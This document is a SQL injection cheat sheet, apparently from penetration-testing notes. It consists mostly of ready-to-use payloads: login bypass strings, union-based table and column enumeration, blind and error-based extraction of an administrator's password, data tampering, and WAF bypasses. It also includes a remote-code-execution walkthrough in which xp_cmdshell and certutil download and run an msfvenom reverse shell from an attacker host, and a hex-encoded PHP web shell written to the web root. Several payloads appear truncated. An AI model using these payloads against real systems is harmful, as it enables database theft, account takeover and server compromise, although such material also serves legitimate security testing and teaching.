# SQL Injection Cheat Sheet sqlSQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This page is about the SQL injection cheat sheet. ### Entry Point Detection Reference: [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#entry-point-detection) ```sql ' %27 %2527 " %22 %2522 ` %60 %2560 # %23 %2523 ; %3B %253B ) %29 %2529 ') %27%29 %2527%2529 ") %22%29 %2522%2529 ``` ### Comment Syntax Comment syntax is depending on the database used in the website. | DBMS | Comments | | ---------- | ------------------------------- | | MySQL | `-- -` (add a space after `--`) | | | `#` | | | `/*comment*/` | | | `/*!comment*/` | | MSSQL | `--` | | | `/*comment*/` | | Oracle | `--` | | PostgreSQL | `--` | | | `/*comment*/` | | SQLite | `--` | | | `/*comment*/` | ### Basic Injection Check if we can inject SQL commands into forms or URL params in the target website. ```sql ' OR 1=1-- ' OR 1=1-- - ' OR 1=1# ' OR '1'='1'-- ' OR '1'='1'-- - ' OR '1'='1'# ' OR '1'='1-- ' OR '1'='1-- - ' OR '1'='1# " OR 1=1-- " OR 1=1-- - " OR 1=1# ') OR 1=1-- ') OR 1=1-- - ') OR 1=1# '; OR 1=1-- '; OR 1=1-- - '; OR 1=1# admin or 1=1-- admin or 1=1-- - admin or 1=1# ``` ### Blind Injection - Timing Reference: [HackTricks](https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing) Using **sleep** method for each query, if results are displayed with a delay, SQLi affects that. ```sql test' AND sleep(10) test ' OR sleep(10) test' WAITFOR DELAY '0:0:10' test' AND DBMS_SESSION.SLEEP(10) test' AND pg_sleep(10) test' OR pg_sleep(10) test' || pg_sleep(10) test' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) ``` ### Brute Force Values ```sql ' password LIKE '%'-- - ' password LIKE BINARY '%'-- - ' password REGEXP '^[a-z]*'-- - ' password REGEXP BINARY '^[a-z]*'-- - ``` ### WAF Bypass Reference: [OWASP](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF) If website filters to prevent our payloads, we need to bypass the filter. #### HTTP Parameter Pollution We may inject by splitting the parameter values on the same keys. ```sql /?id='+select+1&id=2,3+from+users+where+id=1-- - ``` #### New Line (’%0A’) By prepending the new line (URL encoded to ‘%0A’), subsequent syntax may circumvent the filtering. ```sql /?id=%0A' OR 1=1-- - ``` ### Version Detection #### MSSQL ```sql ' UNION SELECT @@version-- ' UNION SELECT NULL,@@version-- ``` #### MySQL ```sql ' UNION SELECT @@version-- - ' UNION SELECT @@version# ' UNION SELECT NULL,@@version-- - ' UNION SELECT NULL,@@version# ``` #### Oracle ```sql ' UNION SELECT 'a' FROM dual-- ' UNION SELECT 'a','b' FROM dual-- ' UNION SELECT * FROM v$version-- ' UNION SELECT BANNER,NULL FROM v$version-- ``` #### PostgreSQL ```sql ' UNION SELECT version()-- ' UNION SELECT NULL,version()-- ``` #### SQLite ```sql ' UNION SELECT sqlite_version()-- ' UNION SELECT sqlite_version(),NULL-- ``` ### Detect Number of Columns The following commands detect the number of the columns in the database. ```sql ' UNION SELECT NULL-- ' UNION SELECT NULL-- - ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL-- - ' UNION SELECT NULL,NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- - ' UNION SELECT 'a',NULL,NULL-- ' UNION SELECT 'a',NULL,NULL-- - ' UNION SELECT NULL,'a',NULL-- ' UNION SELECT NULL,'a',NULL-- - ' UNION SELECT NULL,NULL,'a'-- ' UNION SELECT NULL,NULL,'a'-- - ``` #### UNION ALL We can combine the result of the query into the one column by using “UNION ALL” syntax. ```shellscript ' UNION ALL SELECT "' UNION SELECT flag,NULL,NULL from flags-- -",NULL,NULL from users-- - ``` ### List Table Names Get the table name in which you want to get the information. #### MSSQL ```shellscript ' UNION SELECT table_name,NULL FROM information_schema.tables-- ``` #### MySQL ```shellscript ' UNION SELECT table_name,NULL FROM information_schema.tables-- - ' UNION SELECT table_name,NULL FROM information_schema.tables# ' UNION SELECT group_concat(table_name),NULL FROM information_schema.tables-- - ' UNION SELECT group_concat(table_name),NULL FROM information_schema.tables# ``` #### PostgreSQL ```shellscript ' UNION SELECT table_name,NULL FROM information_schema.tables-- ``` #### Oracle ```shellscript ' UNION SELECT table_name,NULL FROM all_tables-- ``` #### SQLite ```shellscript ' UNION SELECT tbl_name FROM sqlite_master-- ' UNION SELECT tbl_name,NULL FROM sqlite_master-- ``` ### List Column Names Get column names from the table name which we got. #### MSSQL ```shellscript ' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='table_name'-- ``` #### MySQL ```shellscript ' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='table_name'-- - ' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='table_name'# ``` #### PostgreSQL ```shellscript ' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='table_name'-- ``` #### Oracle ```sql ' UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name='table_name'-- ``` #### SQLite ```sql ' UNION SELECT column ``` ### List Information in the Table Get information in the table.\ For instance, suppose we want to get the username and password from the table named 'users'. ```sql ' UNION SELECT username,password FROM users-- ' UNION SELECT username,password FROM users-- - ' UNION SELECT username || '~' || password FROM users-- ' UNION SELECT username || '~' || password FROM users-- - ' UNION SELECT NULL,username || '~' || password FROM users-- ' UNION SELECT NULL,username || '~' || password FROM users-- - ' UNION SELECT username,password FROM users WHERE username='admin' AND password='password1'-- ' UNION SELECT username,password FROM users WHERE username='admin' AND password='password1'-- - ' UNION SELECT username,password FROM users WHERE username='admin' OR password='password1'-- ' UNION SELECT username,password FROM users WHERE username='admin' OR password='password1'-- - ' UNION SELECT username,password FROM users WHERE username='admin' AND password LIKE 'pas%'-- ' UNION SELECT username,password FROM users WHERE username='admin' AND password LIKE 'pas%'-- - ``` **BINARY**: Sensitive to upper case and lower case. ```sql ' UNION SELECT username,password FROM users WHERE username='admin' AND BINARY password='PassWord'-- ' UNION SELECT username,password FROM users WHERE username='admin' AND BINARY password='PassWord'-- - ``` #### Dumping Table ```sql ' UNION SELECT table_name FROM table_name-- ' UNION SELECT table_name,NULL FROM table_name-- ``` ### Fetch All Entities ```sql ' UNION SELECT * FROM users-- - '; SELECT * FROM users-- - ``` ### Modify/Insert Data #### Insert Arbitrary Data ```sql ' INSERT INTO users (username, password) VALUES ('admin', 'pass')-- - '; INSERT INTO users (username, password) VALUES ('admin', 'pass')-- - ' INSERT INTO products (id, name, price) VALUES (999, "", 10)-- - ``` #### Update Arbitrary Data ```sql ' UPDATE users SET password='password123' WHERE username='admin'-- - ' UPDATE users SET password='password123' WHERE id=1-- - ``` #### Upsert This is a combination of **`UPDATE`** and **`INSERT`** operation. If a particular row already exists, it will be updated with new values. Here are examples that update password for the existing **`admin`** user. ```sql INSERT INTO users (username, password) VALUES('admin', '') ON DUPLICATE KEY UPDATE password=''-- - INSERT INTO users (username, password) VALUES ('admin', '') ON CONFLICT (username) DO UPDATE SET password='password'-- ``` ### Command Injection #### MySQL ```sql ' UNION SELECT NULL,sys_eval('whoami') FROM users-- - ``` #### MSSQL ```sql '; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;-- - '; exec master..xp_cmdshell 'powershell -e ';-- - ``` ### RCE #### MSSQL 1. In attack machine, prepare a payload for reverse shell. Replace the ip address of `LHOST` with your ip. ```sql msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe ``` 1. In attack machine, start a local web server to host the payload file. ```shellscript python3 -m http.server 8000 ``` 1. In attack machine, start a listener to receiver incoming connection. ```shellscript nc -lvnp 4444 ``` 1. In target website, execute the shell command with SQLi. ```shellscript ' ; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;-- ' ; EXEC xp_cmdshell 'certutil -urlcache -f http://10.0.0.1:8000/shell.exe C:\Windows\Temp\shell.exe';-- ' ; EXEC xp_cmdshell 'C:\Windows\Temp\shell.exe';-- ``` After execution, we may get a shell of target system. ### Error-based SQLi Reference: [PortSwigger](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based) We might be able to gather information of the database by leading the error message. We can construct SQLi while checking error messages.\ Here are MySQL injection examples. ```sql ' AND 1=CAST((SELECT 1) AS int)-- - ' AND 1=CAST((SELECT password FROM users) AS int)-- - ' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int) ``` In the example above, we may see the password revealed in the error message. ### Blind SQL #### 1. Check if the SQL Injection Works ```plsql ' AND '1'='1 ' AND '1'='2 ' AND (SELECT 'a' FROM users LIMIT 1)='a ``` #### 2. Check if Content Value Exists For example, check if username 'administrator' exists in 'users' ```sql ' AND (SELECT 'a' FROM users WHERE username='administrator')='a ``` If so, determine the password length ```sql ' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a ' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a ... ' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=8)='a ``` Brute force password's character ```sql ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='$a$ ' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='$a$ ... ' AND (SELECT SUBSTRING(password,8,1) FROM users WHERE username='administrator')='$a$ ``` ### Blind SQL (Time-based) #### 1. First Check * **MySQL** ``` ' AND sleep(5)-- - ``` * **PostgreSQL** ```sql '||pg_sleep(10)-- '; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- '; SELECT CASE WHEN (1=2) THEN pg_sleep(10) ELSE pg_sleep(0) END-- ');(SELECT 1234 FROM PG_SLEEP(10))-- ``` #### 2. Check if Content Value Exists ``` '; SELECT CASE WHEN (username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- ``` If so, determine the password length ```sql '; SELECT CASE WHEN (username='administrator' AND LENGTH(password)>1) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- '; SELECT CASE WHEN (username='administrator' AND LENGTH(password)>2) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- ... '; SELECT CASE WHEN (username='administrator' AND LENGTH(password)=8) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- ``` Brute force password character ```sql '; SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,1,1)='$a$') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- '; SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,2,1)='$a$') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- ... '; SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,8,1)='$a$') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- ``` ### Conditional Error #### 1. First Check ```sql ' '' '||(SELECT '')||' '||(SELECT '' FROM dual)||' '||(SELECT '' FROM fake_table)||' '||(SELECT '' FROM users WHERE ROWNUM = 1||' '|| (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' '|| (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' ``` #### 2. Check if Content Value Exists ```sql '|| (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' ``` If so, determine the password length ```sql ''||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' ''||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' ... ''||(SELECT CASE WHEN LENGTH(password)=8 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' ``` Brute force password character ```sql '||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' '||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' ... '||(SELECT CASE WHEN SUBSTR(password,8,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' ``` ### Writing Files We can write arbitary code to a file as below. ```sql ' SELECT '' INTO OUTFILE '/var/www/html/shell.php'-- - ``` #### HEX Encoded Payloads ```shellscript ' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED by 0x3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E-- - ' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED by 0x3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E# ``` **'0x3C3F...'** is a hex encoded text meaning **"\\\"**. After injectin, we can access to **`http://10.0.0.1/shell.php?cmd=whoami`**. ### XML Filter Bypass Reference: [PortSwigger](https://portswigger.net/web-security/sql-injection) ```shellscript 1 SELECT * FROM information_schema.tables ``` If you use **Burp Suite**, it’s recommended to use the **Hackvertor** extention to obfuscate payloads.\ For example, in **Repeater**, highlight the string which you want to encode. Then right-click and select **Extensions → Hackvertor → Encode → hex\_entities**.\ After that, our payload is as below. ```shellscript <@hex_entities> 1 UNION SELECT * FROM information_schema.tables <@/hex_entities> ``` ### XPATH Injection #### MySQL ``` ' AND UPDATEXML(NULL,CONCAT(0x3a,(SELECT SUBSTRING(password,1,16) FROM users)),null)-- - ``` If the error result appears such like the following, we retrieved the piece of the password hash. ``` XPATH syntax error: ':3ac6b24dc611a692' ``` So we can find the remaining of the password hash by injecting below command. ``` ' AND UPDATEXML(NULL,CONCAT(0x3a,(SELECT SUBSTRING(password,17,32) FROM users)),null)-- - ``` ### Truncation Attack We can add another user which is the same name as the existing user by registering the same name user with enough “spaces” to truncate a username.\ First off, check the table schema if can. ```shellscript CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) DEFAULT NULL ); ``` Now send POST request with a payload to create a new admin. ```shellscript # POST request POST /create-user HTTP/1.1 # Create another new "admin" with more than 64 characters. Btw, "+" means the spaces. username=admin+++++++++++++++++++++++++++++++++++++++++++++++++++++++++random&password=password ``` Then check if we can login with a new admin. ``` username=admin&password=password ``` Fetch the admin's information with the original password. ```sql SELECT * FROM users WHERE username='admin'; # It should return the values are the real admin's information. username = admin password = ``` ### References * [PortSwigger](https://portswigger.net/web-security/sql-injection/blind) * [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) * [TryHackMe](https://tryhackme.com/room/adventofcyber2023)